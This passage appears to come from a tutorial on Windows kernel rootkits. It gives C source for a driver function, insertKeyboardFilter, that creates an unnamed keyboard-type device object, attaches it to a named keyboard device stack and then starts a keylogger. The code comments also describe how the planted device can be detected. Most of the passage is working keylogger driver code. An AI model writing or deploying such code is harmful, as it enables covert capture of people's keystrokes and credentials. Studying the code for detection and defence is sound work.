Only the keyManager include statement and the function insertKeyboardFilter were added to filterManager.c:
#include "keyManager.h"

/*
 * insertKeyboardFilter
 *
 * Creates an unnamed device object of type FILE_DEVICE_KEYBOARD owned by
 * pDriverObject and attaches it to the device stack of the device named
 * by deviceName.
 *
 * pDriverObject  driver object that owns the new filter device
 * ppOldDevice    receives the device object the filter was attached to
 * ppNewDevice    receives the new filter device; set to NULL if the
 *                attach fails
 * deviceName     NUL-terminated wide-string name of the target device
 *
 * Returns the IoCreateDevice status if creation fails, otherwise the
 * IoAttachDevice status. StartKeylogger is called only after a
 * successful attach.
 *
 * Detection note: the artifact left behind is an unnamed
 * FILE_DEVICE_KEYBOARD device object, owned by this driver, attached on
 * top of the named device's stack. Walking the attached-device chain of
 * the keyboard stack and checking which driver owns each device exposes it.
 *
 * NOTE(review): none of the pointer arguments is validated here; callers
 * are assumed to pass valid pointers - confirm against the call site.
 */
NTSTATUS insertKeyboardFilter(PDRIVER_OBJECT pDriverObject,
                              PDEVICE_OBJECT* ppOldDevice,
                              PDEVICE_OBJECT* ppNewDevice,
                              wchar_t* deviceName)
{
    UNICODE_STRING targetName = { 0 };
    PDEVICE_OBJECT filterDevice;
    NTSTATUS status;

    /* No device extension (size 0) and no device name (NULL). */
    status = IoCreateDevice(pDriverObject,
                            0,
                            NULL,
                            FILE_DEVICE_KEYBOARD,
                            0,
                            FALSE,
                            ppNewDevice);
    if (!NT_SUCCESS(status))
        return status;

    /*
     * Flags are hard-coded here, not read from the device being attached
     * to. DO_DEVICE_INITIALIZING is cleared before the attach below.
     */
    filterDevice = *ppNewDevice;
    filterDevice->Flags |= (DO_BUFFERED_IO | DO_POWER_PAGABLE);
    filterDevice->Flags &= ~DO_DEVICE_INITIALIZING;

    /* Attach by name; the attached-to device comes back in ppOldDevice. */
    RtlInitUnicodeString(&targetName, deviceName);
    status = IoAttachDevice(filterDevice, &targetName, ppOldDevice);
    if (!NT_SUCCESS(status)) {
        /*
         * Attach failed: delete the filter device so nothing is left
         * behind, and clear the caller's pointer to it.
         */
        IoDeleteDevice(*ppNewDevice);
        *ppNewDevice = NULL;
        return status;
    }

    /*
     * The filter is in the stack. StartKeylogger is defined elsewhere
     * (presumably keyManager.c); any result it produces is not examined.
     */
    StartKeylogger(pDriverObject);
    return status;
}
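This function is very similar to the network filter insertion function, insertNetworkFilter. The new device is created as type FILE_DEVICE_KEYBOARD, and the flags are a bit different: DO_BUFFERED_IO and DO_POWER_PAGABLE are set on the new device, and DO_DEVICE_INITIALIZING is cleared, before it is attached.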